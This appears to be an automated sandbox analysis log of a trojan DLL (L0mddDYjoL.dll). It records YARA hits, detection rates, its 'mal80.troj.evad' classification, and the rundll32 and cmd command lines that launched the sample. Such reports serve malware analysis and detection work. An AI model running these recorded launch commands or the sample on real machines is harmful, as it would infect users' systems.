                      Source: Yara matchFile source: 00000006.00000002.389367218.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.365127503.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: L0mddDYjoL.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: L0mddDYjoL.dllBinary or memory string: OriginalFilenameHen.dllD vs L0mddDYjoL.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 728
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: lz32.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9B07301_2_6E9B0730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9B93701_2_6E9B9370
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9A14941_2_6E9A1494
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9AA4E81_2_6E9AA4E8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9B143C1_2_6E9B143C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9A84281_2_6E9A8428
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9B2234 NtDelayExecution,1_2_6E9B2234
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9B2820 NtAllocateVirtualMemory,1_2_6E9B2820
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9ABB44 NtClose,1_2_6E9ABB44
                      Source: C:\Windows\System32\loaddll32.exeProcess Stats: CPU usage > 98%
                      Source: L0mddDYjoL.dllVirustotal: Detection: 63%
                      Source: L0mddDYjoL.dllReversingLabs: Detection: 67%
                      Source: L0mddDYjoL.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\L0mddDYjoL.dll,Wgpomsdeeomtunmdrt
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\L0mddDYjoL.dll,Wgpomsdeeomtunmdrt
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 728
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 848
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\L0mddDYjoL.dll,WgpomsdeeomtunmdrtJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6340
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4988
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A30.tmpJump to behavior
                      Source: classification engineClassification label: mal80.troj.evad.winDLL@9/10@0/4
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: L0mddDYjoL.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: L0mddDYjoL.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wininet.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: WINMMBASE.pdb7 source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369202824.0000000004F94000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369297298.0000000003324000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369736704.0000000003324000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.375195406.0000000004BDC000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: WINMMBASE.pdb1 source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: ntdsapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb] source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.399803453.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.370078267.000000000331E000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369289634.000000000331E000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384828474.0000000005025000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000A.00000002.384212838.0000000000AD2000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000002.391466880.00000000006F2000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdbQ source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbUm source: WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: dwmapi.pdbW source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000A.00000003.369302646.000000000332A000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369531141.000000000332A000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbY source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdbC source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: winmm.pdb} source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000A.00000003.370078267.000000000331E000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369289634.000000000331E000.00000004.00000001.sdmp
                      Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384828474.0000000005025000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: ffty.pdbj source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbi source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb[ source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.399803453.000000004B280000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: winmm.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: esent.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: pdh.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: ntdsapi.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdbE source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: ffty.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp, L0mddDYjoL.dll
                      Source: Binary string: ffty.pdbVl source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb+ source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000A.00000003.369302646.000000000332A000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369531141.000000000332A000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384741127.0000000005022000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.374283286.00000000055E0000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384815927.0000000005020000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb+ source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: esent.pdb! source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbO source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000A.00000003.369297298.0000000003324000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.369736704.0000000003324000.00000004.00000001.sdmp
                      Source: Binary string: ntdsapi.pdb- source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.374222231.0000000005421000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.384704568.0000000005051000.00000004.00000001.sdmp
                      Source: Binary string: lz32.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbg source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9AF6A8 push esi; mov dword ptr [esp], 00000000h1_2_6E9AF6A9
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
